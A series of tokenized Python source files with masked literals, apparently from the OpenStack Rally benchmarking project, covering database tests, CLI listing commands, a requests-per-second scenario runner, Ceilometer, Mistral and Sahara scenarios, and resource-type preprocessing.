InvalidInput as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_create_duplicated_securitygroup_id ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> try : <EOL> db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] , <EOL> self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> except exception . InvalidInput as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_update ( self ) : <EOL> values_before = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values_before , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> process_after = db . process_update ( <EOL> self . user_ctxt , self . gid , process [ "<STR_LIT>" ] , values ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT:test>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_process_update_process_not_found ( self ) : <EOL> self . assertRaises ( exception . ProcessNotFound , <EOL> db . process_update , <EOL> context = self . user_ctxt , <EOL> gid = self . gid , <EOL> pid = unicode ( uuid . uuid4 ( ) ) , <EOL> values = { } ) <EOL> def test_process_delete ( self ) : <EOL> values_before = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values_before , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> process_after = db . process_delete ( <EOL> self . user_ctxt , self . gid , process [ "<STR_LIT>" ] ) <EOL> self . 
assertEqual ( <NUM_LIT:1> , process_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( process_after . get ( "<STR_LIT>" ) ) <EOL> def test_process_delete_not_found ( self ) : <EOL> self . assertRaises ( exception . ProcessNotFound , <EOL> db . process_delete , <EOL> context = self . user_ctxt , <EOL> gid = self . gid , pid = unicode ( uuid . uuid4 ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from rally import api <EOL> from rally . cli import cliutils <EOL> from rally . cli import envutils <EOL> from rally . common . i18n import _ <EOL> from rally . common import objects <EOL> from rally . common import utils <EOL> from rally import osclients <EOL> class ShowCommands ( object ) : <EOL> """<STR_LIT>""" <EOL> def _print_header ( self , resource_name , credentials ) : <EOL> print ( _ ( "<STR_LIT>" ) <EOL> % { "<STR_LIT>" : resource_name , <EOL> "<STR_LIT:user>" : credentials [ "<STR_LIT:username>" ] , <EOL> "<STR_LIT>" : credentials [ "<STR_LIT>" ] } ) <EOL> @ staticmethod <EOL> def _get_credentials ( deployment ) : <EOL> deployment = api . Deployment . get ( deployment ) <EOL> admin = deployment . deployment . get ( "<STR_LIT>" ) <EOL> credentials = [ admin ] if admin else [ ] <EOL> return credentials + deployment . deployment . get ( "<STR_LIT>" , [ ] ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def images ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" ] <EOL> float_cols = [ "<STR_LIT>" ] <EOL> formatters = dict ( zip ( float_cols , <EOL> [ cliutils . pretty_float_formatter ( col ) <EOL> for col in float_cols ] ) ) <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> glance_client = clients . glance ( ) <EOL> for image in glance_client . images . list ( ) : <EOL> data = [ image . id , image . name , image . size ] <EOL> table_rows . 
append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> formatters = formatters , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def flavors ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> float_cols = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> formatters = dict ( zip ( float_cols , <EOL> [ cliutils . pretty_float_formatter ( col ) <EOL> for col in float_cols ] ) ) <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for flavor in nova_client . flavors . list ( ) : <EOL> data = [ flavor . id , flavor . name , flavor . vcpus , <EOL> flavor . ram , flavor . swap , flavor . disk ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> formatters = formatters , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . 
process_keystone_exc <EOL> def networks ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for network in nova_client . networks . list ( ) : <EOL> data = [ network . id , network . label , network . cidr ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def secgroups ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for secgroup in nova_client . security_groups . list ( ) : <EOL> data = [ secgroup . id , secgroup . name , <EOL> secgroup . description ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , <EOL> data ) ) ) ) <EOL> cliutils . print_list ( <EOL> table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . 
args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def keypairs ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for keypair in nova_client . keypairs . list ( ) : <EOL> data = [ keypair . name , keypair . fingerprint ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) </s>
<s> import itertools <EOL> from rally . common import logging <EOL> from rally import osclients <EOL> from rally . plugins . openstack . cleanup import base as cleanup_base <EOL> from rally . plugins . openstack . context . keystone import roles <EOL> from rally . plugins . openstack . context . keystone import users <EOL> from rally . plugins . openstack . scenarios . cinder import utils as cinder_utils <EOL> from rally . plugins . openstack . scenarios . ec2 import utils as ec2_utils <EOL> from rally . plugins . openstack . scenarios . heat import utils as heat_utils <EOL> from rally . plugins . openstack . scenarios . ironic import utils as ironic_utils <EOL> from rally . plugins . openstack . scenarios . manila import utils as manila_utils <EOL> from rally . plugins . openstack . scenarios . murano import utils as murano_utils <EOL> from rally . plugins . openstack . scenarios . nova import utils as nova_utils <EOL> from rally . plugins . openstack . scenarios . sahara import utils as sahara_utils <EOL> from rally . plugins . openstack . scenarios . vm import utils as vm_utils <EOL> from rally . plugins . openstack . wrappers import glance as glance_utils <EOL> from rally . verification . tempest import config as tempest_conf <EOL> def list_opts ( ) : <EOL> return [ <EOL> ( "<STR_LIT>" , <EOL> itertools . chain ( logging . DEBUG_OPTS , <EOL> osclients . OSCLIENTS_OPTS ) ) , <EOL> ( "<STR_LIT>" , <EOL> itertools . chain ( cinder_utils . CINDER_BENCHMARK_OPTS , <EOL> ec2_utils . EC2_BENCHMARK_OPTS , <EOL> glance_utils . GLANCE_BENCHMARK_OPTS , <EOL> heat_utils . HEAT_BENCHMARK_OPTS , <EOL> ironic_utils . IRONIC_BENCHMARK_OPTS , <EOL> manila_utils . MANILA_BENCHMARK_OPTS , <EOL> murano_utils . MURANO_BENCHMARK_OPTS , <EOL> nova_utils . NOVA_BENCHMARK_OPTS , <EOL> sahara_utils . SAHARA_BENCHMARK_OPTS , <EOL> vm_utils . VM_BENCHMARK_OPTS ) ) , <EOL> ( "<STR_LIT:image>" , <EOL> itertools . chain ( tempest_conf . IMAGE_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . 
chain ( tempest_conf . ROLE_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( roles . ROLES_CONTEXT_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( users . USER_CONTEXT_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( cleanup_base . CLEANUP_OPTS ) ) <EOL> ] </s>
<s> import collections <EOL> import multiprocessing <EOL> import threading <EOL> import time <EOL> from six . moves import queue as Queue <EOL> from rally . common import logging <EOL> from rally . common import utils <EOL> from rally import consts <EOL> from rally . task import runner <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def _worker_process ( queue , iteration_gen , timeout , rps , times , <EOL> max_concurrent , context , cls , method_name , <EOL> args , aborted , info ) : <EOL> """<STR_LIT>""" <EOL> pool = collections . deque ( ) <EOL> sleep = <NUM_LIT:1.0> / rps <EOL> runner . _log_worker_info ( times = times , rps = rps , timeout = timeout , <EOL> cls = cls , method_name = method_name , args = args ) <EOL> time . sleep ( <EOL> ( sleep * info [ "<STR_LIT>" ] ) / info [ "<STR_LIT>" ] ) <EOL> start = time . time ( ) <EOL> timeout_queue = Queue . Queue ( ) <EOL> if timeout : <EOL> collector_thr_by_timeout = threading . Thread ( <EOL> target = utils . timeout_thread , <EOL> args = ( timeout_queue , ) <EOL> ) <EOL> collector_thr_by_timeout . start ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < times and not aborted . is_set ( ) : <EOL> scenario_context = runner . _get_scenario_context ( next ( iteration_gen ) , <EOL> context ) <EOL> worker_args = ( queue , cls , method_name , scenario_context , args ) <EOL> thread = threading . Thread ( target = runner . _worker_thread , <EOL> args = worker_args ) <EOL> i += <NUM_LIT:1> <EOL> thread . start ( ) <EOL> if timeout : <EOL> timeout_queue . put ( ( thread . ident , time . time ( ) + timeout ) ) <EOL> pool . append ( thread ) <EOL> time_gap = time . time ( ) - start <EOL> real_rps = i / time_gap if time_gap else "<STR_LIT>" <EOL> LOG . debug ( "<STR_LIT>" % <EOL> ( i , real_rps , rps ) ) <EOL> while i / ( time . time ( ) - start ) > rps or len ( pool ) >= max_concurrent : <EOL> if pool : <EOL> pool [ <NUM_LIT:0> ] . join ( <NUM_LIT> ) <EOL> if not pool [ <NUM_LIT:0> ] . isAlive ( ) : <EOL> pool . 
popleft ( ) <EOL> else : <EOL> time . sleep ( <NUM_LIT> ) <EOL> while pool : <EOL> thr = pool . popleft ( ) <EOL> thr . join ( ) <EOL> if timeout : <EOL> timeout_queue . put ( ( None , None , ) ) <EOL> collector_thr_by_timeout . join ( ) <EOL> @ runner . configure ( name = "<STR_LIT>" ) <EOL> class RPSScenarioRunner ( runner . ScenarioRunner ) : <EOL> """<STR_LIT>""" <EOL> CONFIG_SCHEMA = { <EOL> "<STR_LIT:type>" : "<STR_LIT:object>" , <EOL> "<STR_LIT>" : consts . JSON_SCHEMA , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } <EOL> } , <EOL> "<STR_LIT>" : False <EOL> } <EOL> def _run_scenario ( self , cls , method_name , context , args ) : <EOL> """<STR_LIT>""" <EOL> times = self . config [ "<STR_LIT>" ] <EOL> timeout = self . config . get ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> iteration_gen = utils . RAMInt ( ) <EOL> cpu_count = multiprocessing . cpu_count ( ) <EOL> max_cpu_used = min ( cpu_count , <EOL> self . config . get ( "<STR_LIT>" , cpu_count ) ) <EOL> processes_to_start = min ( max_cpu_used , times , <EOL> self . config . get ( "<STR_LIT>" , times ) ) <EOL> rps_per_worker = float ( self . config [ "<STR_LIT>" ] ) / processes_to_start <EOL> times_per_worker , times_overhead = divmod ( times , processes_to_start ) <EOL> concurrency_per_worker , concurrency_overhead = divmod ( <EOL> self . config . get ( "<STR_LIT>" , times ) , processes_to_start ) <EOL> self . 
_log_debug_info ( times = times , timeout = timeout , <EOL> max_cpu_used = max_cpu_used , <EOL> processes_to_start = processes_to_start , <EOL> rps_per_worker = rps_per_worker , <EOL> times_per_worker = times_per_worker , <EOL> times_overhead = times_overhead , <EOL> concurrency_per_worker = concurrency_per_worker , <EOL> concurrency_overhead = concurrency_overhead ) <EOL> result_queue = multiprocessing . Queue ( ) <EOL> def worker_args_gen ( times_overhead , concurrency_overhead ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> yield ( result_queue , iteration_gen , timeout , rps_per_worker , <EOL> times_per_worker + ( times_overhead and <NUM_LIT:1> ) , <EOL> concurrency_per_worker + ( concurrency_overhead and <NUM_LIT:1> ) , <EOL> context , cls , method_name , args , self . aborted ) <EOL> if times_overhead : <EOL> times_overhead -= <NUM_LIT:1> <EOL> if concurrency_overhead : <EOL> concurrency_overhead -= <NUM_LIT:1> <EOL> process_pool = self . _create_process_pool ( <EOL> processes_to_start , _worker_process , <EOL> worker_args_gen ( times_overhead , concurrency_overhead ) ) <EOL> self . _join_processes ( process_pool , result_queue ) </s>
<s> SHARE_NETWORKS_CONTEXT_NAME = "<STR_LIT>" </s>
<s> from rally import consts <EOL> from rally . plugins . openstack import scenario <EOL> from rally . plugins . openstack . scenarios . ceilometer import utils as ceiloutils <EOL> from rally . task import validation <EOL> class CeilometerAlarms ( ceiloutils . CeilometerScenario ) : <EOL> """<STR_LIT>""" <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( ) <EOL> def list_alarms ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _list_alarms ( ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_list_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _list_alarms ( alarm . alarm_id ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_update_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> alarm_dict_diff = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> self . _update_alarm ( alarm . alarm_id , alarm_dict_diff ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . 
required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_delete_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _delete_alarm ( alarm . alarm_id ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_alarm_and_get_history ( self , meter_name , threshold , state , <EOL> timeout = <NUM_LIT> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _get_alarm_state ( alarm . alarm_id ) <EOL> self . _get_alarm_history ( alarm . alarm_id ) <EOL> self . _set_alarm_state ( alarm , state , timeout ) </s>
<s> import yaml <EOL> from rally . plugins . openstack import scenario <EOL> from rally . task import atomic <EOL> class MistralScenario ( scenario . OpenStackScenario ) : <EOL> """<STR_LIT>""" <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _list_workbooks ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . clients ( "<STR_LIT>" ) . workbooks . list ( ) <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _create_workbook ( self , definition ) : <EOL> """<STR_LIT>""" <EOL> definition = yaml . safe_load ( definition ) <EOL> definition [ "<STR_LIT:name>" ] = self . generate_random_name ( ) <EOL> definition = yaml . safe_dump ( definition ) <EOL> return self . clients ( "<STR_LIT>" ) . workbooks . create ( definition ) <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _delete_workbook ( self , wb_name ) : <EOL> """<STR_LIT>""" <EOL> self . clients ( "<STR_LIT>" ) . workbooks . delete ( wb_name ) </s>
<s> from rally import consts <EOL> from rally . plugins . openstack import scenario <EOL> from rally . plugins . openstack . scenarios . sahara import utils <EOL> from rally . task import types <EOL> from rally . task import validation <EOL> class SaharaNodeGroupTemplates ( utils . SaharaScenario ) : <EOL> """<STR_LIT>""" <EOL> @ types . convert ( flavor = { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> @ validation . flavor_exists ( "<STR_LIT>" ) <EOL> @ validation . required_services ( consts . Service . SAHARA ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_list_node_group_templates ( self , flavor , <EOL> plugin_name = "<STR_LIT>" , <EOL> hadoop_version = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . _create_master_node_group_template ( flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . _create_worker_node_group_template ( flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . _list_node_group_templates ( ) <EOL> @ types . convert ( flavor = { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> @ validation . flavor_exists ( "<STR_LIT>" ) <EOL> @ validation . required_services ( consts . Service . SAHARA ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_delete_node_group_templates ( self , flavor , <EOL> plugin_name = "<STR_LIT>" , <EOL> hadoop_version = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> master_ngt = self . _create_master_node_group_template ( <EOL> flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> worker_ngt = self . _create_worker_node_group_template ( <EOL> flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . 
_delete_node_group_template ( master_ngt ) <EOL> self . _delete_node_group_template ( worker_ngt ) </s>
<s> import abc <EOL> import copy <EOL> import operator <EOL> import os . path <EOL> import re <EOL> import requests <EOL> from rally . common . i18n import _ <EOL> from rally . common import logging <EOL> from rally . common . plugin import plugin <EOL> from rally import exceptions <EOL> from rally import osclients <EOL> from rally . task import scenario <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ logging . log_deprecated ( "<STR_LIT>" , "<STR_LIT>" , once = True ) <EOL> def set ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> func . _meta_setdefault ( "<STR_LIT>" , { } ) <EOL> func . _meta_get ( "<STR_LIT>" ) . update ( kwargs ) <EOL> return func <EOL> return wrapper <EOL> def _get_preprocessor_loader ( plugin_name ) : <EOL> """<STR_LIT>""" <EOL> def transform ( cls , * args , ** kwargs ) : <EOL> plug = ResourceType . get ( plugin_name ) <EOL> return plug . transform ( * args , ** kwargs ) <EOL> return type ( "<STR_LIT>" % plugin_name , <EOL> ( object , ) , <EOL> { "<STR_LIT>" : classmethod ( transform ) } ) <EOL> def convert ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> preprocessors = dict ( [ ( k , _get_preprocessor_loader ( v [ "<STR_LIT:type>" ] ) ) <EOL> for k , v in kwargs . items ( ) ] ) <EOL> def wrapper ( func ) : <EOL> func . _meta_setdefault ( "<STR_LIT>" , { } ) <EOL> func . _meta_get ( "<STR_LIT>" ) . update ( preprocessors ) <EOL> return func <EOL> return wrapper <EOL> def preprocess ( name , context , args ) : <EOL> """<STR_LIT>""" <EOL> preprocessors = scenario . Scenario . get ( name ) . _meta_get ( "<STR_LIT>" , <EOL> default = { } ) <EOL> clients = osclients . Clients ( context [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> processed_args = copy . deepcopy ( args ) <EOL> for src , preprocessor in preprocessors . items ( ) : <EOL> resource_cfg = processed_args . get ( src ) <EOL> if resource_cfg : <EOL> processed_args [ src ] = preprocessor . 
transform ( <EOL> clients = clients , resource_config = resource_cfg ) <EOL> return processed_args <EOL> class ResourceType ( plugin . Plugin ) : <EOL> @ classmethod <EOL> @ abc . abstractmethod <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> class DeprecatedResourceType ( object ) : <EOL> @ classmethod <EOL> @ abc . abstractmethod <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> def obj_from_name ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:name>" in resource_config : <EOL> matching_exact = [ resource for resource in resources <EOL> if resource . name == resource_config [ "<STR_LIT:name>" ] ] <EOL> if len ( matching_exact ) == <NUM_LIT:1> : <EOL> return matching_exact [ <NUM_LIT:0> ] <EOL> elif len ( matching_exact ) > <NUM_LIT:1> : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( typename = typename . title ( ) , <EOL> pattern = resource_config [ "<STR_LIT:name>" ] , <EOL> ids = "<STR_LIT:U+002CU+0020>" . join ( map ( <EOL> operator . attrgetter ( "<STR_LIT:id>" ) , <EOL> matching_exact ) ) ) ) <EOL> patternstr = resource_config [ "<STR_LIT:name>" ] <EOL> elif "<STR_LIT>" in resource_config : <EOL> patternstr = resource_config [ "<STR_LIT>" ] <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( typename = typename . title ( ) , <EOL> resource_config = resource_config ) ) <EOL> pattern = re . compile ( patternstr ) <EOL> matching = [ resource for resource in resources <EOL> if re . search ( pattern , resource . name ) ] <EOL> if not matching : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , pattern = pattern . pattern ) ) <EOL> elif len ( matching ) > <NUM_LIT:1> : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . 
format ( typename = typename . title ( ) , <EOL> pattern = pattern . pattern , <EOL> ids = "<STR_LIT:U+002CU+0020>" . join ( map ( operator . attrgetter ( "<STR_LIT:id>" ) , <EOL> matching ) ) ) ) <EOL> return matching [ <NUM_LIT:0> ] <EOL> def obj_from_id ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:id>" in resource_config : <EOL> matching = [ resource for resource in resources <EOL> if resource . id == resource_config [ "<STR_LIT:id>" ] ] <EOL> if len ( matching ) == <NUM_LIT:1> : <EOL> return matching [ <NUM_LIT:0> ] <EOL> elif len ( matching ) > <NUM_LIT:1> : <EOL> raise exceptions . MultipleMatchesFound ( <EOL> needle = "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , id = resource_config [ "<STR_LIT:id>" ] ) , <EOL> haystack = matching ) <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , id = resource_config [ "<STR_LIT:id>" ] ) ) <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , resource_config = resource_config ) ) <EOL> def _id_from_name ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> return obj_from_name ( resource_config , resources , typename ) . id <EOL> def _name_from_id ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> return obj_from_id ( resource_config , resources , typename ) . name <EOL> def log_deprecated_resource_type ( func ) : <EOL> """<STR_LIT>""" <EOL> def inner ( cls , clients , resource_config ) : <EOL> LOG . warning ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> cls . 
__name__ ) <EOL> return func ( cls , clients , resource_config ) <EOL> return inner <EOL> class FlavorResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> novaclient = clients . nova ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = novaclient . flavors . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_id <EOL> class EC2FlavorResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_name = resource_config . get ( "<STR_LIT:name>" ) <EOL> if not resource_name : <EOL> novaclient = clients . nova ( ) <EOL> resource_name = _name_from_id ( resource_config = resource_config , <EOL> resources = novaclient . flavors . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_name <EOL> class ImageResourceType ( DeprecatedResourceType 